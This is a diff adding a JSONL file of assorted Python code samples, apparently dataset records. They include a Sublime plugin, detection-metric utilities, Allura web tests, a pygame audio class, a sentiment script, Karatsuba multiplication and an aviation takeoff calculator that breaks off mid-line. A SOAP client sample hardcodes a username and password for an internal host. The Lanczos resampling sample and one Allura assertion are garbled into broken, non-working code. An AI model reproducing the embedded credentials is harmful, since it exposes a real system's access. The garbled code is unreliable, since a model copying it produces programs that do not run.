diff --git "a/5915.jsonl" "b/5915.jsonl"
new file mode 100644--- /dev/null
+++ "b/5915.jsonl"
@@ -0,0 +1,203 @@
+{"seq_id":"372228726","text":"import base64\nimport os\nimport sublime\nimport sys\nimport tempfile\nimport time\nfrom typing import Any, Dict, Optional\nfrom .utils import dotted_get\nfrom .log import log\n\n\ndef get_package_name() -> str:\n \"\"\"\n @brief Getsthe package name.\n\n @return The package name.\n \"\"\"\n\n # __package__ will be \"THE_PLUGIN_NAME.plugin\" under this folder structure\n # anyway, the top module should always be the plugin name\n return __package__.partition(\".\")[0]\n\n\ndef get_package_path() -> str:\n \"\"\"\n @brief Gets the package path.\n\n @return The package path.\n \"\"\"\n\n return \"Packages/\" + get_package_name()\n\n\ndef get_expanding_variables(window: Optional[sublime.Window]) -> Dict[str, Any]:\n variables = {\n \"home\": os.path.expanduser(\"~\"),\n \"package_name\": get_package_name(),\n \"package_path\": get_package_path(),\n \"temp_dir\": tempfile.gettempdir(),\n }\n\n if window:\n variables.update(window.extract_variables())\n\n return variables\n\n\ndef get_image_path(img_name: str) -> str:\n \"\"\"\n @brief Get the image resource path from plugin settings.\n\n @param img_name The image name\n\n @return The image resource path.\n \"\"\"\n\n img_path = get_setting(\"image_files\")[img_name]\n\n # assert for potential dev code typos\n assert isinstance(img_path, str)\n\n return sublime.expand_variables(img_path, get_expanding_variables(sublime.active_window()))\n\n\ndef get_image_info(img_name: str) -> Dict[str, Any]:\n \"\"\"\n @brief Get image informations of an image from plugin settings.\n\n @param img_name The image name\n\n @return The image information.\n \"\"\"\n\n from .libs import imagesize\n\n img_path = get_image_path(img_name)\n img_ext = os.path.splitext(img_path)[1]\n img_mime = \"image/png\"\n\n assert img_ext.lower() == \".png\"\n\n try:\n img_bytes = sublime.load_binary_resource(img_path)\n except IOError:\n log(\"error\", \"Resource not found: \" + img_path)\n\n img_base64 = base64.b64encode(img_bytes).decode()\n img_w, img_h = imagesize.get_from_bytes(img_bytes)\n\n return {\n \"base64\": img_base64,\n \"bytes\": img_bytes,\n \"ext\": img_ext,\n \"mime\": img_mime,\n \"path\": img_path,\n \"ratio_wh\": img_w / img_h,\n \"size\": (img_w, img_h),\n }\n\n\ndef get_image_color(img_name: str, region: sublime.Region) -> str:\n \"\"\"\n @brief Get the image color from plugin settings in the form of #RRGGBBAA.\n\n @param img_name The image name\n @param region The region\n\n @return The color code in the form of #RRGGBBAA\n \"\"\"\n\n from .image_processing import color_code_to_rgba\n\n img_color = get_setting(\"image_colors\")[img_name]\n\n # assert for potential dev code typos\n assert isinstance(img_color, str)\n\n return color_code_to_rgba(img_color, region)\n\n\ndef get_settings_file() -> str:\n \"\"\"\n @brief Get the settings file name.\n\n @return The settings file name.\n \"\"\"\n\n return get_package_name() + \".sublime-settings\"\n\n\ndef get_settings_object() -> sublime.Settings:\n \"\"\"\n @brief Get the plugin settings object.\n\n @return The settings object.\n \"\"\"\n\n return sublime.load_settings(get_settings_file())\n\n\ndef get_setting(dotted: str, default: Optional[Any] = None) -> Any:\n \"\"\"\n @brief Get the plugin setting with the dotted key.\n\n @param dotted The dotted key\n @param default The default value if the key doesn't exist\n\n @return The setting's value.\n \"\"\"\n\n return dotted_get(get_settings_object(), dotted, default)\n\n\ndef get_timestamp() -> float:\n \"\"\"\n @brief Get the current timestamp (in second).\n\n @return The timestamp.\n \"\"\"\n\n return time.time()\n\n\ndef get_setting_renderer_interval() -> int:\n \"\"\"\n @brief Get the renderer interval.\n\n @return The renderer interval.\n \"\"\"\n\n interval = get_setting(\"renderer_interval\", 250)\n\n if interval < 0:\n interval = sys.maxsize\n\n # a minimum for not crashing the system accidentally\n return int(max(30, interval))\n\n\ndef get_setting_show_open_button(view: sublime.View) -> str:\n from .functions import is_view_too_large\n\n return get_setting(\n \"show_open_button_fallback\"\n if not view.is_loading() and is_view_too_large(view)\n else \"show_open_button\"\n )\n","sub_path":"plugin/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"52695351","text":"# ==============================================================================\n# Copyright (C) 2020 Eta Compute, Inc\n# *\n# * Licensed under the Apache License, Version 2.0 (the \"License\");\n# * you may not use this file except in compliance with the License.\n# * You may obtain a copy of the License at\n# *\n# * http://www.apache.org/licenses/LICENSE-2.0\n# *\n# * Unless required by applicable law or agreed to in writing, software\n# * distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n# *\n# * This is part of Tensai Software Development Kit.\n# *\n# ==============================================================================\n\nimport json\nimport copy\n\n#eta_testset_person.json is a dictionary with image file names as keys\n#and their associated image size, labels and ground truth boxes .\n#\n#Dictionary format is \n#{\"image_name0\": [image size, \n# {\"label_name_0\": [ [xmin0, ymin0, w0, h0], \n# [xmin1, ymin1, w1, h1],\n# ...\n# ],\n# \"label_name_1\": ...\n# }\n# ]\n# \"image_name1\": ...\n#}\n# \n#Original images are of different sizes.\n#Ground truth boxes are wth respect to the original image size.\n#Box coordinates are [xmin, ymin, w, h] as in the Coco format,\n#where (xmin, ymin) is the upper left corner of the bounding box\n\n#Functions for getting image names, labels and bounding boxes\ndef load_eta_testset(json_file):\n#json_file is the json file containing the groundtruth\n with open(json_file) as fid:\n eta_testset = json.load(fid)\n return eta_testset\n\ndef load_prediction_json(prediction_file):\n with open(prediction_file) as fid:\n return json.load(fid)\n\ndef num_images(gt_dict):\n return len(gt_dict)\n\ndef list_all_images(gt_dict):\n return list(gt_dict)\n\ndef size_image(gt_dict, image_name):\n#Returns the size of the image [W, H]. \n#Note that ground truth boxes are with respect to this image size.\n if image_name in gt_dict:\n size = list(gt_dict[image_name][0])\n else:\n size = [0, 0]\n return size\n\ndef labels_image(gt_dict, image_name):\n#Returns all labels for a given image\n if image_name in gt_dict:\n labels = list(gt_dict[image_name][1])\n else:\n labels = []\n return labels\n\ndef gtboxes_image(gt_dict, image_name, desired_label, resize=[]):\n#Returns all ground truth boxes associated with a label for an image\n#gtbox coordinates = [xmin, ymin, w, h]; COCO format\n#Coordinates of gtboxes can be resized if resize parameter is specified.\n#resize = [W, H]\n bboxes = []\n if image_name in gt_dict.keys():\n #bboxes = gt_dict[image_name][1][desired_label]\n bboxes_dict = gt_dict[image_name][1]\n # if desired_label in foo:\n if desired_label in bboxes_dict.keys():\n bboxes = copy.deepcopy(bboxes_dict[desired_label])\n #resize boxes \n assert len(resize) == 2\n img_size = size_image(gt_dict, image_name)\n for bbox in bboxes:\n bbox[0] = (bbox[0] / img_size[0]) * resize[0]\n bbox[1] = (bbox[1] / img_size[1]) * resize[1]\n bbox[2] = (bbox[2] / img_size[0]) * resize[0]\n bbox[3] = (bbox[3] / img_size[1]) * resize[1]\n\n return bboxes\n\n#Functions for calculating metrics\ndef areaBox( box ):\n#box = [xmin, ymin, w, h]; COCO format\n return (box[2] * box[3])\n\ndef areaIntersection( box1, box2 ):\n#box coordinates [ xmin, ymin, w, h] ; COCO format\n xmin = max( box1[0], box2[0] )\n ymin = max( box1[1], box2[1] )\n xmax = min( box1[0]+box1[2], box2[0]+box2[2] ) #xmin+w\n ymax = min( box1[1]+box1[3], box2[1]+box2[3] ) #ymin+h\n if ymin < ymax and xmin < xmax:\n aa = (xmax - xmin)*(ymax-ymin)\n else:\n aa = 0\n return aa\n\ndef calculate_iou(box1, box2):\n#box coordinates [ xmin, ymin, w, h] ; COCO format\n area1 = areaBox(box1)\n area2 = areaBox(box2)\n intersect = areaIntersection(box1, box2)\n iou = intersect / ( area1 + area2 - intersect )\n if iou > 1 or iou < 0:\n print(\"ERROR IN IOU\")\n return iou\n\ndef calculate_metrics(infered_boxes_list, ground_truth_boxes_list, iou_th = 0):\n len_gt = len(ground_truth_boxes_list)\n len_pred = len(infered_boxes_list)\n TP = 0 #true positives\n FP = 0 #false postives\n FN = 0 #false negatives\n TN = 0 #true negative\n # gtbox_list = copy.deepcopy(ground_truth_boxes_list)\n visited = [0] * len(ground_truth_boxes_list)\n for pred_i, pred_box in enumerate(infered_boxes_list):\n max_iou = 0\n det_i = -1\n visited_i = -1\n # y = -1\n for gt_i, gt_box in enumerate(ground_truth_boxes_list):\n # y += 1\n iou = calculate_iou(pred_box, gt_box)\n if iou > max_iou:\n # y_max = y \n max_iou = iou\n det_i = pred_i # eqv to y_max = y, but what is the use?\n visited_i = gt_i\n # max_box = gt\n # keep an indicater array which identifies the used up gt box\n if max_iou > iou_th and visited[visited_i] == 0:\n TP += 1\n # gtbox_list.remove(max_box)\n visited[visited_i] = 1\n FP = max([len_pred - TP, 0])\n FN = max([len_gt - TP, 0])\n #if there are no ground truth boxes and no boxes are predicted, \n #then it is declared as a true negative\n if (len_gt == 0) and (TP + FP == 0):\n TN = 1\n return TP, FP, FN, TN\n\n\n'''\n#test code\neta_testset = load_eta_testset('/home/hari/test_images_source/scripts/')\nprint('num images = ', num_images(eta_testset))\nimages = list_all_images(eta_testset)\n#print('all images = ', images)\nN = 23\nimage = images[N] #pick an image\nprint('Nth image name ', N, image)\nprint('image size ', size_image(eta_testset, image))\nprint('labels ', labels_image(eta_testset, image)) \nlabels = labels_image(eta_testset, image)\nfor label in labels:\n print('label ', label)\n boxes = gtboxes_image(eta_testset, image, label)\n print('bboxes =', boxes)\n\nif 'person' in labels:\n boxes = gtboxes_image(eta_testset, image, 'person')\nprint('bboxes for person = ', boxes)\n'''\n","sub_path":"Tools/tiny_eye_newbbox_eval/eta_eval_utils.py","file_name":"eta_eval_utils.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"625725427","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\nfrom mock import patch\n\nfrom allura.tests import TestController\nfrom allura import model as M\n\n\nclass TestDiscuss(TestController):\n\n def test_subscribe_unsubscribe(self):\n home = self.app.get('/wiki/_discuss/')\n subscribed = [i for i in home.html.findAll('input')\n if i.get('type') == 'checkbox'][0]\n assert 'checked' not in subscribed.attrMap\n link = [a for a in home.html.findAll('a')\n if 'thread' in a['href']][0]\n params = {\n 'threads-0._id': link['href'][len('/p/test/wiki/_discuss/thread/'):-1],\n 'threads-0.subscription': 'on'}\n r = self.app.post('/wiki/_discuss/subscribe',\n params=params,\n headers={'Referer': '/wiki/_discuss/'})\n r = r.follow()\n subscribed = [i for i in r.html.findAll('input')\n if i.get('type') == 'checkbox'][0]\n assert 'checked' in subscribed.attrMap\n params = {\n 'threads-0._id': link['href'][len('/p/test/wiki/_discuss/thread/'):-1]\n }\n r = self.app.post('/wiki/_discuss/subscribe',\n params=params,\n headers={'Referer': '/wiki/_discuss/'})\n r = r.follow()\n subscribed = [i for i in r.html.findAll('input')\n if i.get('type') == 'checkbox'][0]\n assert 'checked' not in subscribed.attrMap\n\n def _make_post(self, text):\n home = self.app.get('/wiki/_discuss/')\n thread_link = [a for a in home.html.findAll('a')\n if 'thread' in a['href']][0]['href']\n thread = self.app.get(thread_link)\n for f in thread.html.findAll('form'):\n if f.get('action', '').endswith('/post'):\n break\n params = dict()\n inputs = f.findAll('input')\n for field in inputs:\n if field.has_key('name'):\n params[field['name']] = field.has_key(\n 'value') and field['value'] or ''\n params[f.find('textarea')['name']] = text\n r = self.app.post(f['action'].encode('utf-8'), params=params,\n headers={'Referer': thread_link.encode(\"utf-8\")},\n extra_environ=dict(username='root'))\n r = r.follow()\n return r\n\n @patch('allura.controllers.discuss.g.spam_checker.submit_spam')\n def test_post(self, submit_spam):\n home = self.app.get('/wiki/_discuss/')\n thread_link = [a for a in home.html.findAll('a')\n if 'thread' in a['href']][0]['href']\n r = self._make_post('This is a post')\n assert 'This is a post' in r, r\n post_link = str(\n r.html.find('div', {'class': 'edit_post_form reply'}).find('form')['action'])\n r = self.app.get(post_link[:-2], status=302)\n r = self.app.get(post_link)\n post_form = r.html.find('form', {'action': post_link})\n params = dict()\n inputs = post_form.findAll('input')\n for field in inputs:\n if field.has_key('name'):\n params[field['name']] = field.has_key(\n 'value') and field['value'] or ''\n params[post_form.find('textarea')['name']] = 'This is a new post'\n r = self.app.post(post_link,\n params=params,\n headers={'Referer': thread_link.encode(\"utf-8\")})\n r = r.follow()\n assert 'This is a new post' in r, r\n r = self.app.get(post_link)\n assert str(r).count('This is a new post') == 3\n post_form = r.html.find('form', {'action': post_link + 'reply'})\n params = dict()\n inputs = post_form.findAll('input')\n for field in inputs:\n if field.has_key('name'):\n params[field['name']] = field.has_key(\n 'value') and field['value'] or ''\n params[post_form.find('textarea')['name']] = 'Tis a reply'\n r = self.app.post(post_link + 'reply',\n params=params,\n headers={'Referer': post_link.encode(\"utf-8\")})\n r = self.app.get(thread_link)\n assert 'Tis a reply' in r, r\n permalinks = [post.find('form')['action'].encode('utf-8')\n for post in r.html.findAll('div', {'class': 'edit_post_form reply'})]\n self.app.post(permalinks[1] + 'flag')\n self.app.post(permalinks[1] + 'moderate', params=dict(delete='delete'))\n self.app.post(permalinks[0] + 'moderate', params=dict(spam='spam'))\n assert submit_spam.call_args[0] == (\n 'This is a new post',), submit_spam.call_args[0]\n\n def test_permissions(self):\n home = self.app.get('/wiki/_discuss/')\n thread_url = [a for a in home.html.findAll('a')\n if 'thread' in a['href']][0]['href']\n thread_id = thread_url.rstrip('/').split('/')[-1]\n thread = M.Thread.query.get(_id=thread_id)\n\n # ok initially\n non_admin = 'test-user'\n self.app.get(thread_url, status=200,\n extra_environ=dict(username=non_admin))\n\n # set wiki page private\n from forgewiki.model import Page\n # need to look up the page directly, so ming is aware of our change\n page = Page.query.get(_id=thread.ref.artifact._id)\n project = M.Project.query.get(shortname='test')\n role_admin = M.ProjectRole.by_name('Admin', project)._id\n page.acl = [\n M.ACE.allow(role_admin, M.ALL_PERMISSIONS),\n M.DENY_ALL,\n ]\n\n self.app.get(thread_url, status=200, # ok\n extra_environ=dict(username='test-admin'))\n self.app.get(thread_url, status=403, # forbidden\n extra_environ=dict(username=non_admin))\n\n def test_spam_link(self):\n r = self._make_post('Test post')\n assert 'Spam' in r\n r = self.app.get('/wiki/_discuss/',\n extra_environ={'username': 'test-user-1'})\n assert 'Spam' not in r, 'User without moderate perm must not see Spam link'\n\n @patch('allura.controllers.discuss.g.spam_checker.submit_spam')\n def test_moderate(self, submit_spam):\n r = self._make_post('Test post')\n post_link = str(\n r.html.find('div', {'class': 'edit_post_form reply'}).find('form')['action'])\n post = M.Post.query.find().first()\n post.status = 'pending'\n self.app.post(post_link + 'moderate', params=dict(spam='spam'))\n assert submit_spam.call_args[0] == (\n 'Test post',), submit_spam.call_args[0]\n post = M.Post.query.find().first()\n assert post.status == 'spam'\n self.app.post(post_link + 'moderate', params=dict(approve='approve'))\n post = M.Post.query.find().first()\n assert post.status == 'ok'\n self.app.post(post_link + 'moderate', params=dict(delete='delete'))\n assert M.Post.query.find().count() == 0\n\n def test_post_paging(self):\n home = self.app.get('/wiki/_discuss/')\n thread_link = [a for a in home.html.findAll('a')\n if 'thread' in a['href']][0]['href']\n # just make sure it doesn't 500\n self.app.get('%s?limit=50&page=0' % thread_link)\n\n @patch('allura.controllers.discuss.g.director.create_activity')\n def test_edit_post(self, create_activity):\n r = self._make_post('This is a post')\n assert create_activity.call_count == 1, create_activity.call_count\n assert create_activity.call_args[0][1] == 'posted'\n create_activity.reset_mock()\n thread_url = r.request.url\n reply_form = r.html.find(\n 'div', {'class': 'edit_post_form reply'}).find('form')\n post_link = str(reply_form['action'])\n assert 'This is a post' in str(\n r.html.find('div', {'class': 'display_post'}))\n assert 'Last edit:' not in str(\n r.html.find('div', {'class': 'display_post'}))\n params = dict()\n inputs = reply_form.findAll('input')\n for field in inputs:\n if field.has_key('name'):\n params[field['name']] = field.has_key(\n 'value') and field['value'] or ''\n params[reply_form.find('textarea')['name']] = 'zzz'\n self.app.post(post_link, params)\n assert create_activity.call_count == 1, create_activity.call_count\n assert create_activity.call_args[0][1] == 'modified'\n r = self.app.get(thread_url)\n assert 'zzz' in str(r.html.find('div', {'class': 'display_post'}))\n assert 'Last edit: Test Admin less than 1 minute ago' in str(\n r.html.find('div', {'class': 'display_post'}))\n\n\nclass TestAttachment(TestController):\n\n def setUp(self):\n super(TestAttachment, self).setUp()\n home = self.app.get('/wiki/_discuss/')\n self.thread_link = [a['href'].encode(\"utf-8\")\n for a in home.html.findAll('a')\n if 'thread' in a['href']][0]\n thread = self.app.get(self.thread_link)\n for f in thread.html.findAll('form'):\n if f.get('action', '').endswith('/post'):\n break\n self.post_form_link = f['action'].encode('utf-8')\n params = dict()\n inputs = f.findAll('input')\n for field in inputs:\n if field.has_key('name'):\n params[field['name']] = field.has_key(\n 'value') and field['value'] or ''\n params[f.find('textarea')['name']] = 'Test Post'\n r = self.app.post(f['action'].encode('utf-8'), params=params,\n headers={'Referer': self.thread_link})\n r = r.follow()\n self.post_link = str(\n r.html.find('div', {'class': 'edit_post_form reply'}).find('form')['action'])\n\n def test_attach(self):\n r = self.app.post(self.post_link + 'attach',\n upload_files=[('file_info', 'test.txt', 'HiThere!')])\n r = self.app.get(self.thread_link)\n for alink in r.html.findAll('a'):\n if 'attachment' in alink['href']:\n alink = str(alink['href'])\n break\n else:\n assert False, 'attachment link not found'\n assert '
' in r\n r = self.app.get(alink)\n assert r.content_disposition == 'attachment;filename=\"test.txt\"', 'Attachments should force download'\n r = self.app.post(self.post_link + 'attach',\n upload_files=[('file_info', 'test.o12', 'HiThere!')])\n r = self.app.post(alink, params=dict(delete='on'))\n\n @patch('allura.model.discuss.Post.notify')\n def test_reply_attach(self, notify):\n notify.return_value = True\n r = self.app.get(self.thread_link)\n post_form = r.html.find('form', {'action': self.post_link + 'reply'})\n params = dict()\n inputs = post_form.findAll('input')\n\n for field in inputs:\n if field.has_key('name') and (field['name'] != 'file_info'):\n params[field['name']] = field.has_key(\n 'value') and field['value'] or ''\n params[post_form.find('textarea')['name']] = 'Reply'\n r = self.app.post(self.post_link + 'reply',\n params=params,\n upload_files=[('file_info', 'test.txt', 'HiThere!')])\n r = self.app.get(self.thread_link)\n assert \"test.txt\" in r\n","sub_path":"Allura/allura/tests/functional/test_discuss.py","file_name":"test_discuss.py","file_ext":"py","file_size_in_byte":12377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"362684791","text":"from os import listdir\nfrom os.path import join\n\nfrom pygame.mixer import Channel, Sound, music\n\nfrom GameChild import *\nfrom Input import *\n\nclass Audio(GameChild):\n\n current_channel = None\n paused = False\n muted = False\n\n def __init__(self, game):\n GameChild.__init__(self, game)\n self.load_fx()\n self.subscribe_to(self.get_custom_event_id(), self.mute)\n\n def load_fx(self):\n fx = {}\n if self.get_configuration().has_option(\"audio\", \"sfx-path\"):\n root = self.get_resource(\"audio\", \"sfx-path\")\n for name in listdir(root):\n fx[name.split(\".\")[0]] = Sound(join(root, name))\n self.fx = fx\n\n def mute(self, event):\n if self.is_command(event, \"mute\"):\n self.muted = not self.muted\n self.set_volume()\n\n def set_volume(self):\n volume = int(not self.muted)\n music.set_volume(volume)\n if self.current_channel:\n self.current_channel.set_volume(volume)\n\n def play_bgm(self, path, stream=False):\n self.stop_current_channel()\n if stream:\n music.load(path)\n music.play(-1)\n else:\n self.current_channel = Sound(path).play(-1)\n self.set_volume()\n\n def stop_current_channel(self):\n music.stop()\n if self.current_channel:\n self.current_channel.stop()\n self.current_channel = None\n self.paused = False\n\n def play_fx(self, name):\n if not self.muted:\n self.fx[name].play()\n\n def pause(self):\n channel = self.current_channel\n paused = self.paused\n if paused:\n music.unpause()\n if channel:\n channel.unpause()\n else:\n music.pause()\n if channel:\n channel.pause()\n self.paused = not paused\n","sub_path":"pgfw/Audio.py","file_name":"Audio.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"489815023","text":"import suds\nfrom suds.client import Client\nfrom suds.transport.http import HttpAuthenticated\nimport urllib2\nimport sys\nimport string\nimport ctypes\n\ntry:\n retval = ''\n\n client = Client(url='http://smazapppiqas.sanmiguel.local:50200/dir/wsdl?p=sa/08b3370daf2a396592e703975276cdeb',username='PIAPPLPID', password='SanMigu3l2015')\n object = client.factory.create('MT_Request')\n unidad = client.factory.create('MT_Request.Unidad')\n unidad.EXIDV = '01000000000000017970' #sys.argv[1] # '01000000000000011103' # sys.argv[1]\n\n object.Unidad.append(unidad)\n result = client.service.SI_OS_PP377ING(object.Unidad)\n if result[0].result != 'OK':\n retval = ('ERROR: No se desarmo correctamente el pallet. ' + result[0].MESSAGE).encode('utf8')\n else:\n retval = result[0].result\n\n\nexcept suds.WebFault as e2:\n retval = 'ERROR:' + str(e2.message).encode('utf8') + '(QAS)'\n\nexcept urllib2.URLError as e1:\n retval = 'ERROR:' + str(e1.reason).encode('utf8') + '(QAS)'\n\nexcept Exception as e:\n retval = 'ERROR:' + str(e.message).encode('utf8') + '(QAS)'\nfinally:\n exit(retval)\n","sub_path":"qas/pp377ing.py","file_name":"pp377ing.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"147211417","text":"import os\nimport sys\nfrom pathlib import Path\n\nimport pickle\nfrom pathlib import Path\nimport json\nfrom IPython.display import display\n\n\n\nfrom tensorflow.keras.layers import Input, Embedding, GRU\nfrom tensorflow.keras.layers import Dropout, GlobalMaxPooling1D\nfrom tensorflow.keras.layers import Bidirectional, Dense\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom utils import preprocess\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport re\n\ntokenizer_file = Path('Datasets/sentiment140/tokenizer.pickle').resolve()\nwith tokenizer_file.open('rb') as file:\n tokenizer = pickle.load(file)\n\ninput_dim = min(tokenizer.num_words, len(tokenizer.word_index) + 1)\nembedding_dim = 200\ninput_length = 100\ngru_units = 128\ngru_dropout = 0.1\nrecurrent_dropout = 0.1\ndropout = 0.1\n\n\nmodel = Sequential()\nmodel.add(Embedding(\n input_dim=input_dim,\n output_dim=embedding_dim,\n input_shape=(input_length,)\n))\n\nmodel.add(Bidirectional(GRU(\n gru_units,\n return_sequences=True,\n dropout=gru_dropout,\n recurrent_dropout=recurrent_dropout\n)))\nmodel.add(GlobalMaxPooling1D())\nmodel.add(Dense(32, activation='relu'))\nmodel.add(Dropout(dropout))\n\nmodel.add(Dense(1, activation='sigmoid'))\n\nweights_path = Path('../models/gru_model.h5').resolve()\nmodel.load_weights(weights_path.as_posix())\n\nrelations_path = Path('query_relations.json')\nwith relations_path.open('r') as file:\n relations = json.load(file)\n\ndataset_dir = Path('Datasets/tweepy').resolve()\n\ndata_dict = {}\n\nquery_dict = {\n 'query': [],\n 'mean': [],\n 'max': [],\n 'min': [],\n 'std': [],\n 'count': [],\n 'emotion': []\n}\n\ndir_files = os.listdir(dataset_dir)\ndel dir_files[-1]\nprint(dir_files)\n\nwith tqdm(total=len(dir_files)) as t:\n for filename in dir_files:\n dataset = pd.read_csv(os.path.join(dataset_dir, filename))\n cleaned_texts = preprocess(dataset.text, quiet=True)\n\n query = re.findall(r'(#[^.]+|:.+:)', filename)[0]\n\n predict_sequences = [text.split() for text in cleaned_texts]\n list_tokenized_predict = tokenizer.texts_to_sequences(predict_sequences)\n x_predict = pad_sequences(list_tokenized_predict, maxlen=100)\n\n result = model.predict(x_predict)\n\n emotion = relations[query]\n query_dict['query'].append(query)\n query_dict['mean'].append(np.mean(result))\n query_dict['max'].append(np.amax(result))\n query_dict['min'].append(np.amin(result))\n query_dict['count'].append(len(dataset))\n query_dict['std'].append(np.std(result))\n query_dict['emotion'].append(emotion)\n\n if emotion in data_dict:\n data_dict[emotion] = np.concatenate([data_dict[emotion], result])\n else:\n data_dict[emotion] = result\n\n t.update()\n\ndf = pd.DataFrame(data=query_dict)\nfor emotion in df.emotion.unique():\n display(df[df.emotion == emotion])\n\nemotion_dict = {\n 'emotion': [],\n 'mean': [],\n 'max': [],\n 'min': [],\n 'std': [],\n 'count': []\n}\n\nfor emotion, result in data_dict.items():\n emotion_dict['emotion'].append(emotion)\n emotion_dict['mean'].append(np.mean(result))\n emotion_dict['max'].append(np.amax(result))\n emotion_dict['min'].append(np.amin(result))\n emotion_dict['std'].append(np.std(result))\n emotion_dict['count'].append(len(result))\n\nemotion_df = pd.DataFrame(data=emotion_dict)\ndisplay(emotion_df)\n","sub_path":"Scripts/sentimentscore.py","file_name":"sentimentscore.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"599338095","text":"import numpy as np\ndef lanczos1d(x,a=3):\n if a<=0: raise(\"a should be large than 0\")\n x=np.atleast_1d(x)\n out=np.zeros_like(x)\n mask=x==0\n if mask.any():\n out[mask]=1\n mask=(x>=-a) & (x
=0) & (xx=0) & (xx=0) & (yy= 10:\n tmp = 1\n else:\n tmp = 0\n if tmp == 1:\n rs = '1' + rs\n for i in range(len(rs)):\n if rs[i] != '0':\n break\n return rs[i:]\n\ndef sub(str1, str2):\n max_len = len(str1)\n while len(str2) < max_len:\n str2 = '0' + str2\n rs = ''\n tmp = 0\n\n for i in range(max_len-1, -1, -1):\n a = ord(str1[i]) - ord('0')\n b = ord(str2[i]) - ord('0')\n tmp += a - b\n rs = chr(tmp%10 + ord('0')) + rs\n if tmp < 0:\n tmp = -1\n else:\n tmp = 0\n for i in range(len(rs)):\n if rs[i] != '0':\n break\n return rs[i:]\n\n\ndef mul(str1, str2):\n max_len = max(len(str1), len(str2))\n if log(max_len,2) != int(log(max_len,2)):\n power = int(log(max_len,2))\n max_len = 2**(power+1)\n while len(str1) < max_len:\n str1 = '0' + str1\n while len(str2) < max_len:\n str2 = '0' + str2\n if len(str1) == 1:\n return str(int(str1) * int(str2))\n num_len = len(str1)\n mid = int(num_len/2)\n a = str1[:mid]\n b = str1[mid:]\n c = str2[:mid]\n d = str2[mid:]\n print(a,b,c,d)\n step1 = mul(a, c)\n step2 = mul(b, d)\n step3 = mul(add(a, b), add(c, d))\n step4 = sub(sub(step3, step2), step1)\n while len(step2) < num_len:\n step2 = '0' + step2\n for i in range(mid):\n step4 += '0'\n rs = add(step1 + step2, step4)\n for i in range(len(rs)):\n if rs[i] != '0':\n break\n return rs[i:]\n\nn1 = '3141592653589793238462643383279502884197169399375105820974944592'\nn2 = '2718281828459045235360287471352662497757247093699959574966967627'\n#n1 = input()\n#n2 = input()\nprint(mul(n1,n2))\n","sub_path":"class1/week1/mul.py","file_name":"mul.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"56504137","text":"import std_atm\nimport math\nimport pandas as pd\n\n\nclass Takeoff_Land(object):\n\n # def __init__(self, weight_kg, field_elevation=0, altimeter_inHg=29.92,\n # OAT_C=15, to_flaps=2, to_mode=1, appr_flaps=2, land_flaps=5,\n # wind_true_heading=360, wind_speed=0, rwy_mag_heading=0,\n # wind_gusts=0, icing=False, model=190):\n # self.weight_kg = weight_kg\n # self.field_elevation = field_elevation\n # self.altimeter = altimeter_inHg\n # self.OAT_C = OAT_C\n # self.model = model\n # self.icing = icing\n # self.press_alt = std_atm.pressure_alt(\n # self.field_elevation, self.altimeter)\n # self.to_flaps = to_flaps\n # self.to_mode = to_mode\n # self.land_flaps = land_flaps\n # self.wind_true_heading = wind_true_heading\n # self.wind_speed = wind_speed\n # self.rwy_mag_heading = rwy_mag_heading\n # self.wind_gusts = wind_gusts\n\n def __init__(self):\n self.weight_kg = 40000\n self.field_elevation = 0\n self.altimeter_inHg = 29.92\n self.OAT_C = 15\n self.model = 190\n self.icing = False\n self.to_flaps = 2\n self.to_mode = 1\n self.appr_flaps = 2\n self.land_flaps = 5\n self.wind_true_heading = 360\n self.wind_speed = 0\n self.magvar = 7\n self.rwy_mag_heading = 0\n self.wind_gusts = 0\n\n\n # print(df_vfs)\n def load_df(self):\n self.df_to_columns = pd.read_csv(\n '{}_to_columns.csv'.format(self.model), index_col=[0, 1, 2])\n self.df_vac = pd.read_csv('{}_vac.csv'.format(self.model), index_col=0)\n self.df_vfs = pd.read_csv('{}_vfs.csv'.format(self.model), index_col=0)\n self.df_vspeed = pd.read_csv(\n '{}_vspeed.csv'.format(self.model), index_col=[0, 1, 2])\n self.df_vref = pd.read_csv(\n '{}_vref.csv'.format(self.model), index_col=0)\n\n def find_to_col(self):\n press_alt = math.ceil(self.press_alt / 1000) * 1000\n # print(self.press_alt)\n # print(press_alt)\n s_to_columns =\\\n self.df_to_columns.ix[self.to_flaps].ix[self.to_mode].ix[press_alt]\n column = 0\n for i in range(10):\n if s_to_columns[i] > self.OAT_C:\n column = math.floor(i / 2) + 1\n break\n self.to_columm = column\n\n def find_vspeed(self):\n weight = math.ceil(self.weight_kg / 1000) * 1000\n # print(weight)\n s_vspeeds = self.df_vspeed.ix[\n 